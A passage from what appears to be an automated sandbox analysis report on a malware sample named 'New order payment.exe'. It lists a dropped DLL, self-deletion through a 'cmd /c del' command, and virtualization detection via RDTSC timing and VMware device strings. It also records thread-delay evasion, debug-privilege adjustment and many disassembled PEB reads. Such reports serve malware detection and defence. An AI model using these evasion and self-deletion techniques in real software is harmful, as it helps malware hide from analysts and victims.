          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D94F18 push edi; retf 14_2_02D94F19
          Source: C:\Users\user\Desktop\New order payment.exeFile created: C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\New order payment.exe'Jump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\New order payment.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New order payment.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D98604 second address: 0000000002D9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D9898E second address: 0000000002D98994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6456Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 6316Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\New order payment.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATA?6
          Source: explorer.exe, 00000004.00000000.254493114.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.248427538.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: New order payment.exe, 00000000.00000002.244218595.0000000000776000.00000004.00000020.sdmpBinary or memory string: \divorces\tryout\marmalade.bmpjylqawoozfsSOFTWARE\roscoepduiiqsjbwqemuykqfwrylxmvbggeyuzsvpgz21176
          Source: explorer.exe, 00000004.00000000.280451175.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.247577904.00000000011B3000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%%
          Source: explorer.exe, 00000004.00000000.274875851.000000000DC2B000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}))
          Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.249068214.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.257414229.000000000DC67000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Shell\M22
          Source: explorer.exe, 00000004.00000000.288676486.000000000DC2B000.00000004.00000001.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&96
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_73223070 sclag,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,0_2_73223070
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\New order payment.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732254DA mov eax, dword ptr fs:[00000030h]0_2_732254DA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_7322581C mov eax, dword ptr fs:[00000030h]0_2_7322581C
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_7322579F mov eax, dword ptr fs:[00000030h]0_2_7322579F
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732256EE mov eax, dword ptr fs:[00000030h]0_2_732256EE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732257DE mov eax, dword ptr fs:[00000030h]0_2_732257DE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989080 mov eax, dword ptr fs:[00000030h]1_2_00989080
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BF0BF mov ecx, dword ptr fs:[00000030h]1_2_009BF0BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BF0BF mov eax, dword ptr fs:[00000030h]1_2_009BF0BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BF0BF mov eax, dword ptr fs:[00000030h]1_2_009BF0BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A03884 mov eax, dword ptr fs:[00000030h]1_2_00A03884
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A03884 mov eax, dword ptr fs:[00000030h]1_2_00A03884
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C90AF mov eax, dword ptr fs:[00000030h]1_2_009C90AF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A1B8D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A1B8D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A1B8D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A1B8D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A1B8D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A1B8D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009858EC mov eax, dword ptr fs:[00000030h]1_2_009858EC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]1_2_009840E1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]1_2_009840E1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]1_2_009840E1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB8E4 mov eax, dword ptr fs:[00000030h]1_2_009AB8E4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB8E4 mov eax, dword ptr fs:[00000030h]1_2_009AB8E4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]1_2_009AA830
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]1_2_009AA830
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]1_2_009AA830
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]1_2_009AA830
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A54015 mov eax, dword ptr fs:[00000030h]1_2_00A54015
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A54015 mov eax, dword ptr fs:[00000030h]1_2_00A54015
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]1_2_0099B02A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]1_2_0099B02A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]1_2_0099B02A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]1_2_0099B02A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]1_2_00A07016
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]1_2_00A07016
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]1_2_00A07016
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]1_2_009B002D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]1_2_009B002D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]1_2_009B002D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]1_2_009B002D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]1_2_009B002D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A0050 mov eax, dword ptr fs:[00000030h]1_2_009A0050
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A0050 mov eax, dword ptr fs:[00000030h]1_2_009A0050
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51074 mov eax, dword ptr fs:[00000030h]1_2_00A51074
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A42073 mov eax, dword ptr fs:[00000030h]1_2_00A42073
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]1_2_00A449A4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]1_2_00A449A4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]1_2_00A449A4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]1_2_00A449A4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A069A6 mov eax, dword ptr fs:[00000030h]1_2_00A069A6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2990 mov eax, dword ptr fs:[00000030h]1_2_009B2990
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AC182 mov eax, dword ptr fs:[00000030h]1_2_009AC182
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA185 mov eax, dword ptr fs:[00000030h]1_2_009BA185
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]1_2_00A051BE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]1_2_00A051BE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]1_2_00A051BE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]1_2_00A051BE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B61A0 mov eax, dword ptr fs:[00000030h]1_2_009B61A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B61A0 mov eax, dword ptr fs:[00000030h]1_2_009B61A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A141E8 mov eax, dword ptr fs:[00000030h]1_2_00A141E8
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]1_2_0098B1E1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]1_2_0098B1E1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]1_2_0098B1E1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]1_2_00989100
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]1_2_00989100
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]1_2_00989100
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B513A mov eax, dword ptr fs:[00000030h]1_2_009B513A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B513A mov eax, dword ptr fs:[00000030h]1_2_009B513A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]1_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]1_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]1_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]1_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov ecx, dword ptr fs:[00000030h]1_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB944 mov eax, dword ptr fs:[00000030h]1_2_009AB944
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB944 mov eax, dword ptr fs:[00000030h]1_2_009AB944
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B171 mov eax, dword ptr fs:[00000030h]1_2_0098B171
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B171 mov eax, dword ptr fs:[00000030h]1_2_0098B171
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C962 mov eax, dword ptr fs:[00000030h]1_2_0098C962
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BD294 mov eax, dword ptr fs:[00000030h]1_2_009BD294
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BD294 mov eax, dword ptr fs:[00000030h]1_2_009BD294
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099AAB0 mov eax, dword ptr fs:[00000030h]1_2_0099AAB0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099AAB0 mov eax, dword ptr fs:[00000030h]1_2_0099AAB0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFAB0 mov eax, dword ptr fs:[00000030h]1_2_009BFAB0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]1_2_009852A5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]1_2_009852A5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]1_2_009852A5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]1_2_009852A5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]1_2_009852A5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2ACB mov eax, dword ptr fs:[00000030h]1_2_009B2ACB
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2AE4 mov eax, dword ptr fs:[00000030h]1_2_009B2AE4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A3A1C mov eax, dword ptr fs:[00000030h]1_2_009A3A1C
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]1_2_00985210
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov ecx, dword ptr fs:[00000030h]1_2_00985210
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]1_2_00985210
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]1_2_00985210
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AA16 mov eax, dword ptr fs:[00000030h]1_2_0098AA16
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AA16 mov eax, dword ptr fs:[00000030h]1_2_0098AA16
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00998A0A mov eax, dword ptr fs:[00000030h]1_2_00998A0A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C4A2C mov eax, dword ptr fs:[00000030h]1_2_009C4A2C
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C4A2C mov eax, dword ptr fs:[00000030h]1_2_009C4A2C
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AA16 mov eax, dword ptr fs:[00000030h]1_2_00A4AA16
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AA16 mov eax, dword ptr fs:[00000030h]1_2_00A4AA16
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]1_2_009AA229
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3B260 mov eax, dword ptr fs:[00000030h]1_2_00A3B260
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3B260 mov eax, dword ptr fs:[00000030h]1_2_00A3B260
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58A62 mov eax, dword ptr fs:[00000030h]1_2_00A58A62
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]1_2_00989240
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]1_2_00989240
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]1_2_00989240
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]1_2_00989240
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C927A mov eax, dword ptr fs:[00000030h]1_2_009C927A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4EA55 mov eax, dword ptr fs:[00000030h]1_2_00A4EA55
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A14257 mov eax, dword ptr fs:[00000030h]1_2_00A14257
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A55BA5 mov eax, dword ptr fs:[00000030h]1_2_00A55BA5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BB390 mov eax, dword ptr fs:[00000030h]1_2_009BB390
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2397 mov eax, dword ptr fs:[00000030h]1_2_009B2397
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00991B8F mov eax, dword ptr fs:[00000030h]1_2_00991B8F
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00991B8F mov eax, dword ptr fs:[00000030h]1_2_00991B8F
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3D380 mov ecx, dword ptr fs:[00000030h]1_2_00A3D380
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4138A mov eax, dword ptr fs:[00000030h]1_2_00A4138A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]1_2_009B4BAD
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]1_2_009B4BAD
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]1_2_009B4BAD
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A053CA mov eax, dword ptr fs:[00000030h]1_2_00A053CA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A053CA mov eax, dword ptr fs:[00000030h]1_2_00A053CA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009ADBE9 mov eax, dword ptr fs:[00000030h]1_2_009ADBE9
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]1_2_009B03E2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]1_2_009B03E2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]1_2_009B03E2
